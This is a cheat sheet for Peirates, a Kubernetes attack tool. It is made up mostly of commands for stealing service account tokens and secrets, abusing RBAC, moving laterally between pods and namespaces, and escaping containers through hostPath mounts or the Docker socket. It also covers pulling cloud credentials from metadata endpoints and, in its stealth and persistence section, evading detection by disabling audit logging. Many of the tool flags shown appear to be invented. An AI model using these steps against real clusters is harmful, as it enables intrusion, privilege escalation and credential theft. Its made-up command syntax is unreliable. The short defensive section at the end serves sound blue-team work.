Installation
From Source
git clone https://github.com/inguardians/peirates.git
cd peirates
go build -o peirates
chmod +x peirates
Using Go
go install github.com/inguardians/peirates@latest
Docker
docker build -t peirates .
docker run -it --rm peirates
In Kubernetes Pod
# Download from release or build inside pod
curl -L https://github.com/inguardians/peirates/releases/download/v1.x.x/peirates-linux-amd64 -o peirates
chmod +x peirates
./peirates
Interactive Mode
peirates -i
# Main menu options
[0] Exit
[1] List service accounts
[2] Get secrets
[3] Enumerate pods
[4] Execute commands
[5] Exploit RBAC
[6] Mount volumes
[7] Access API server
[8] Container escape
Service Account Enumeration
| Command | Description |
|---|
peirates -i → Option 1 | List all service accounts in current namespace |
peirates -namespaces | Enumerate service accounts across namespaces |
peirates -list-all-service-accounts | Get all SAs from cluster-wide view |
peirates -service-account [name] | Get details of specific service account |
peirates -get-service-account-token | Extract service account token from /run/secrets |
Service Account Token Location
# Mounted automatically in pod
cat /run/secrets/kubernetes.io/serviceaccount/token
cat /run/secrets/kubernetes.io/serviceaccount/ca.crt
cat /run/secrets/kubernetes.io/serviceaccount/namespace
Test Token Permissions
peirates -test-auth
peirates -auth-as-serviceaccount [namespace] [sa-name]
List Secrets in Namespace
peirates -i
# Select: Get secrets
# Choose namespace and list all
peirates -get-secret [secret-name] [namespace]
peirates -get-secret-values [secret-name]
Base64 Decoding Secrets
# Peirates auto-decodes, but manual:
echo "[base64-value]" | base64 -d
# In cluster:
kubectl get secret [name] -o jsonpath='{.data.[key]}' | base64 -d
Common Secrets to Target
# Database credentials
peirates -get-secret database-password
# API keys
peirates -get-secret api-keys
# Docker registry
peirates -get-secret docker-registry-creds
# OAuth tokens
peirates -get-secret oauth-token
# SSH keys
peirates -get-secret ssh-keypair
Pod Listing & Reconnaissance
Enumerate All Pods
peirates -i
# Select: Enumerate pods
peirates -list-all-pods
peirates -list-pods [namespace]
Get Pod Details
peirates -pod-details [pod-name] [namespace]
peirates -get-pod-info
# Container image (find vulnerable versions)
# Image pull secrets
# Service account used
# Node assignment
# Volume mounts
# Network policies
# Resource limits
RBAC Exploitation
Check Current Permissions
peirates -i
# Select: Check RBAC permissions
peirates -check-rbac
peirates -can-i [verb] [resource]
Common Exploitable Verbs
peirates -can-i get secrets
peirates -can-i create pods
peirates -can-i exec pods
peirates -can-i port-forward pods
peirates -can-i patch deployments
peirates -can-i delete pods
peirates -can-i get events
Enumerate RBAC Misconfigurations
peirates -enumerate-rbac
peirates -list-roles [namespace]
peirates -list-clusterroles
peirates -get-role-bindings
Wildcard Permissions
# Look for * (all) permissions
peirates -find-dangerous-permissions
peirates -find-wildcard-rules
Lateral Movement Between Pods
Exec into Pod
peirates -i
# Select: Execute commands on pods
peirates -exec [pod-name] [namespace] [command]
peirates -exec my-pod default /bin/bash
Use Service Account to Access Other Pods
# Use extracted token to auth as different SA
peirates -auth-as-serviceaccount [namespace] [sa-name]
peirates -list-pods [target-namespace]
Move Between Namespaces
# Extract token with higher privileges
# Use that token to enumerate new namespace
peirates -token-analysis [token]
peirates -test-token-permissions [token]
DNS Service Discovery
# Kubernetes DNS: service.namespace.svc.cluster.local
nslookup kubernetes.default.svc.cluster.local
nslookup database.production.svc.cluster.local
# With peirates:
peirates -enumerate-dns
peirates -resolve-kubernetes-dns
Volume Mounting Attacks
List Volume Mounts
peirates -i
# Select: Mount volumes
peirates -list-volumes [namespace]
peirates -get-volume-info [pod-name]
Mount Host Root Filesystem
# Create privileged pod with host volume mount
peirates -create-pod-with-volume
# Specify hostPath: /
# Or manually:
apiVersion: v1
kind: Pod
metadata:
name: privesc-pod
spec:
containers:
- name: shell
image: busybox
volumeMounts:
- name: host
mountPath: /host
volumes:
- name: host
hostPath:
path: /
nodeSelector:
kubernetes.io/hostname: [target-node]
Access ConfigMaps via Volume
peirates -mount-configmap [configmap-name]
# Access at mounted path for sensitive configs
API Server Interaction
Direct API Access
peirates -i
# Select: API server operations
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/run/secrets/kubernetes.io/serviceaccount/ca.crt
curl --cacert $CACERT -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/secrets
Common API Endpoints
# List all API resources
curl -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/
# Specific resource access
curl -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces
curl -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/secrets
curl -H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/pods
Modify Resources via API
# Patch deployment
peirates -patch-deployment [name] [namespace]
# Create privileged pod
peirates -create-privileged-pod [namespace]
# Delete pod
peirates -delete-pod [pod-name] [namespace]
Container Escape Techniques
Check for Dangerous Capabilities
peirates -check-capabilities
peirates -find-dangerous-caps
# Manual check:
grep Cap /proc/self/status
Exploitable Capabilities
CAP_SYS_ADMIN # Can escape with cgroup/device manipulation
CAP_NET_ADMIN # Network manipulation
CAP_SYS_MODULE # Load kernel modules
CAP_SETFCAP # Set file capabilities
CAP_DAC_OVERRIDE # Bypass file permission checks
Docker Socket Access
# Check if mounted:
ls -la /var/run/docker.sock
peirates -check-docker-socket
peirates -use-docker-socket [command]
# If accessible, break out of K8s cluster:
docker ps
docker images
docker run -v /:/host --rm -it alpine chroot /host /bin/bash
Kernel Exploit Path
# Check kernel version
uname -r
peirates -find-kernel-exploits
peirates -suggest-escape-path
# Common targets: CVE-2021-22555, CVE-2021-4034, CVE-2022-0847
# AWS:
curl http://169.254.169.254/latest/meta-data/
peirates -access-aws-metadata
# Azure:
curl -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
peirates -access-azure-metadata
# GCP:
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
peirates -access-gcp-metadata
peirates -extract-cloud-credentials
peirates -get-aws-credentials
peirates -get-azure-credentials
peirates -get-gcp-credentials
Common Kubernetes Attack Paths
Path 1: Service Account Token Abuse
1. peirates -get-service-account-token
2. peirates -test-auth
3. peirates -can-i get secrets
4. peirates -get-secret [target]
5. Use token with cloud provider API
Path 2: RBAC Misconfiguration
1. peirates -check-rbac
2. peirates -find-dangerous-permissions
3. peirates -list-clusterroles
4. peirates -get-role-bindings
5. Escalate to cluster-admin equivalent
Path 3: Privileged Pod Execution
1. peirates -check-rbac
2. If can create pods: peirates -create-privileged-pod
3. Exec into privileged pod
4. Mount host filesystem
5. peirates -host-shell
Path 4: Volume-Based Secrets
1. peirates -list-volumes
2. Identify secret volumes
3. peirates -mount-secret-volume
4. Extract credentials
5. Access other systems
Path 5: Lateral Namespace Movement
1. peirates -enumerate-rbac
2. Find SAs with cross-namespace access
3. peirates -auth-as-serviceaccount [ns] [sa]
4. peirates -list-pods [target-ns]
5. peirates -exec [pod] [ns] [cmd]
Stealth & Persistence
Avoid Detection
# Disable audit logging access (if possible):
peirates -disable-audit
# Create service account with obscure name:
peirates -create-stealthy-serviceaccount
# Use existing pods instead of creating new ones:
peirates -exec [existing-pod] [namespace] [command]
Persistence Techniques
# Add SSH key to pod:
peirates -add-ssh-key [pod] [namespace] [pubkey]
# Create cron job for callback:
peirates -create-cron-job [namespace]
# Modify webhook:
peirates -patch-webhook [name]
Chaining Attacks
Full Chain Example
# 1. Get current token
peirates -i
# Select: Get service account token
# 2. Check permissions
peirates -can-i get secrets
# 3. Extract secrets
peirates -list-all-pods
peirates -get-secret database-password production
# 4. Escalate privileges
peirates -find-dangerous-permissions
peirates -create-privileged-pod production
# 5. Escape container
peirates -check-docker-socket
peirates -use-docker-socket 'docker ps'
# 6. Access node
docker run -v /:/host --rm -it alpine chroot /host /bin/bash
Troubleshooting
Connection Errors
# Verify API server reachable:
curl -k https://kubernetes.default.svc/api
# Check token valid:
TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
curl -H "Authorization: Bearer $TOKEN" \
https://kubernetes.default.svc/api/v1/namespaces
Permission Denied
# Check actual permissions:
peirates -can-i [action] [resource]
# Verify service account:
peirates -whoami
# Try different service account:
peirates -auth-as-serviceaccount [ns] [sa]
Hanging/Timeout
# Increase timeout:
peirates -i -timeout 30s
# Use specific API server:
peirates -apiserver [ip:port]
# Check network policy:
kubectl get networkpolicies
Defense & Detection
Blue Team Mitigations
# Restrict RBAC to least privilege
# Monitor service account token usage
# Audit secret access
# Restrict volume mounts (no hostPath in PSP)
# Enable Pod Security Policy/Standards
# Monitor privileged pod creation
# Restrict port-forward commands
# Network policies for pod-to-pod isolation
Detection Signatures
# Monitor for:
- Service account token access in logs
- Unusual API calls from pods
- Privileged pod creation
- Host filesystem mounts
- Exec commands in pods
- Cross-namespace resource access
- Secret enumeration attempts
